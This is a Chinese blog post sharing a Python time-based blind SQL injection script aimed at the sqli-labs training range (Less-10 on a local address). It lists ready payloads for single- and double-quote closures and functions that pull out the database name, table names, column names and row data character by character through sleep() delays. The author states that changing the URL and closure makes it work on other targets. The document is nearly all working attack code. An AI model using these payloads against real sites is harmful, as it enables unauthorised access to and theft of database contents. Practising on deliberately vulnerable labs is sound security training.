时间盲注脚本
这个脚本是一个时间盲注小脚本,在sqli-labs中17关之前的只要把url改了用这个脚本基本都可以跑得出来,只是要注意闭合方式需要修改,把脚本中的payload更换一下就可以跑出结果来。随便写的就没有写注释了。
#coding:utf-8
import requests
import datetime
import time
# Reference notes kept as a bare module-level string. It is not the module
# docstring (imports precede it) and nothing reads it at runtime. Translated:
#   k drives LIMIT (which row), i drives substr (which character position),
#   j drives the ASCII value / character being guessed.
#   Then the single-quote and double-quote payload variants, one per step
#   (database length, database name, table names, column names, row data);
#   each function below carries the double-quote form live and the
#   single-quote form commented out.
"""
k控制着limit
i控制着substr
j控制着所猜字符的ascii
payload :
单引号盲注:
猜数据库长度:
payload = "?id=1' and if(length(database())>%s,sleep(2),0) --+" %i
猜数据库名字:
payload = "?id=1' and if(substr(database(),%d,1)='%s',sleep(3),1) --+" % (i,j)
猜表名:
payload = "?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1))=%d,sleep(3),0) --+" % (k, i, j)
猜列名:
payload = "?id=1' and if(ascii(substr((select column_name from information_schema.columns where table_name='%s' and table_schema=database() limit %d,1),%d,1))=%d,sleep(3),0) --+" % (table_name, k, i, j)
爆数据:
payload = "?id=1' and if(ascii(substr((select %s from %s limit %d,1),%d,1))=%d, sleep(2),0)--+" % (column,table,k,i,j)
双引号盲注:
猜数据库长度:
payload = '?id=1" and if(length(database())>%s,sleep(2),0) --+' %i
猜数据库名字:
payload = '?id=1" and if(substr(database(),%d,1)="%s",sleep(3),1) --+' % (i,j)
猜表名:
payload = '?id=1" and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1))=%d,sleep(3),0) --+' % (k, i, j)
猜列名:
payload = '?id=1" and if(ascii(substr((select column_name from information_schema.columns where table_name="%s" and table_schema=database() limit %d,1),%d,1))=%d,sleep(3),0) --+' % (table_name, k, i, j)
爆数据:
payload = '?id=1" and if(ascii(substr((select %s from %s limit %d,1),%d,1))=%d, sleep(2),0)--+' % (column,table,k,i,j)
"""
# Base URL of the local sqli-labs training instance (Less-10); every function
# below appends its own query string to this value.
url = 'http://192.168.1.6/sqli-labs/Less-10/index.php'
def database_len():
    """Infer the length of the current database name from response timing.

    Each probe asks whether ``length(database()) > i``; a delayed response
    (>= 2 whole seconds) is read as "true" and the loop continues, the first
    undelayed response stops it.

    Returns:
        The first ``i`` whose probe did not delay, i.e. the smallest ``i``
        with ``length(database()) <= i``. If all 14 probes delay, the loop
        simply runs out and 14 is returned.
    """
    for i in range(1,15):
        payload = '?id=1" and if(length(database())>%s,sleep(2),0) --+' %i
        #payload = "?id=1' and if(length(database())>%s,sleep(2),0) --+" %i
        time1 = datetime.datetime.now()
        # The response body is never inspected; only the elapsed time matters.
        r = requests.get(url+ payload)
        time2 = datetime.datetime.now()
        # .seconds is the whole-seconds component of the timedelta (truncated,
        # not rounded); total_seconds() would give the full elapsed value.
        sec = (time2 - time1).seconds
        if sec >= 2:
            print(i)
        else:
            print(i)
            break
    print('database_len:',i)
    return i
def database_name(len):
    """Recover the database name one character position at a time.

    Args:
        len: number of character positions to probe (normally the value
            returned by ``database_len``). The parameter name shadows the
            builtin ``len`` inside this function.

    Prints the name as it grows and once more at the end; returns None.
    """
    name = ''
    for i in range(1,len+1):
        # Candidate alphabet is digits plus lowercase letters only; a position
        # whose character is outside it produces no match and is silently
        # skipped (nothing is appended for that position).
        for j in '0123456789abcdefghijklmnopqrstuvwxyz':
            payload = '?id=1" and if(substr(database(),%d,1)="%s",sleep(3),1) --+' % (i,j)
            #payload = "?id=1' and if(substr(database(),%d,1)='%s',sleep(3),1) --+" % (i,j)
            time1 = datetime.datetime.now()
            # Response body unused; the elapsed time is the only signal.
            r = requests.get(url + payload)
            time2 = datetime.datetime.now()
            # Whole-seconds component only (truncated).
            sec = (time2 - time1).seconds
            if sec >=3:
                name += j
                print(name)
                break
    print('database_name:',name)
def table_name():
    """Read table names of the current database character by character.

    Iterates up to 6 rows (``k``, the LIMIT offset) of up to 10 positions
    (``i``) each, trying ASCII codes 65..122 (``j``) per position. All
    recovered characters are accumulated into one string with no separator
    between rows. Prints each matched character and the final string;
    returns None.
    """
    name = ''
    for k in range(6):
        for i in range(10):
            for j in range(65,123):
                payload = '?id=1" and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1))=%d,sleep(3),0) --+' % (k, i, j)
                #payload = "?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1))=%d,sleep(3),0) --+" % (k, i, j)
                time1 = datetime.datetime.now()
                # Response body unused; only the elapsed time is checked.
                r = requests.get(url+payload)
                time2 = datetime.datetime.now()
                # Whole-seconds component only (truncated).
                sec = (time2-time1).seconds
                if sec >= 3:
                    name += chr(j)
                    print(chr(j))
                    break
    print("table_name:",name)
    # Dead assignment: the local goes out of scope immediately after this.
    name = ''
def colum_name(table_name):
    """Read column names of one table character by character.

    Args:
        table_name: name of the table to inspect, interpolated directly into
            the query string. Note the parameter shadows the module-level
            function ``table_name`` inside this body.

    Same loop shape as ``table_name``: up to 6 rows, 10 positions each,
    ASCII codes 65..122; all matches are concatenated into one string.
    Prints each matched character and the final string; returns None.
    """
    name = ''
    for k in range(6):
        for i in range(10):
            for j in range(65, 123):
                payload = '?id=1" and if(ascii(substr((select column_name from information_schema.columns where table_name="%s" and table_schema=database() limit %d,1),%d,1))=%d,sleep(3),0) --+' % (table_name, k, i, j)
                #payload = "?id=1' and if(ascii(substr((select column_name from information_schema.columns where table_name='%s' and table_schema=database() limit %d,1),%d,1))=%d,sleep(3),0) --+" % (table_name, k, i, j)
                time1 = datetime.datetime.now()
                # Response body unused; only the elapsed time is checked.
                r = requests.get(url+payload)
                time2 = datetime.datetime.now()
                # Whole-seconds component only (truncated).
                sec = (time2-time1).seconds
                if sec >= 3:
                    name += chr(j)
                    print(chr(j))
                    break
    print("column_name:", name)
    # Dead assignment: the local goes out of scope immediately after this.
    name = ''
def data(column,table):
    """Read the values of one column character by character.

    Args:
        column: column to select, interpolated directly into the query.
        table: table to select from, interpolated directly into the query.

    Up to 6 rows, positions 1..9 each, ASCII codes 65..122; the delay
    threshold here is 2 seconds (the other functions use 3). All matches
    are concatenated into one string. Prints each matched character and the
    final string; returns None.
    """
    name = ''
    for k in range(6):
        for i in range(1,10):
            for j in range(65,123):
                payload = '?id=1" and if(ascii(substr((select %s from %s limit %d,1),%d,1))=%d, sleep(2),0)--+' % (column,table,k,i,j)
                #payload = "?id=1' and if(ascii(substr((select %s from %s limit %d,1),%d,1))=%d, sleep(2),0)--+" % (column,table,k,i,j)
                time1 = datetime.datetime.now()
                # Response body unused; only the elapsed time is checked.
                r = requests.get(url+payload)
                time2 = datetime.datetime.now()
                # Whole-seconds component only (truncated).
                sec = (time2-time1).seconds
                if sec >= 2:
                    name += chr(j)
                    print(chr(j))
                    break
    print("data:", name)
    # Dead assignment: the local goes out of scope immediately after this.
    name = ''
if __name__ == '__main__':
    # Runs the steps in order against the module-level `url`. Binding the
    # result to `len` shadows the builtin for the rest of the module.
    len = database_len()
    database_name(len)
    table_name()
    colum_name('users')
    # data('username','users')
作者:qianyuzz
出处:https://www.cnblogs.com/qianyuzz/p/17060050.html
版权:本作品采用「署名-非商业性使用-相同方式共享 4.0 国际」许可协议进行许可。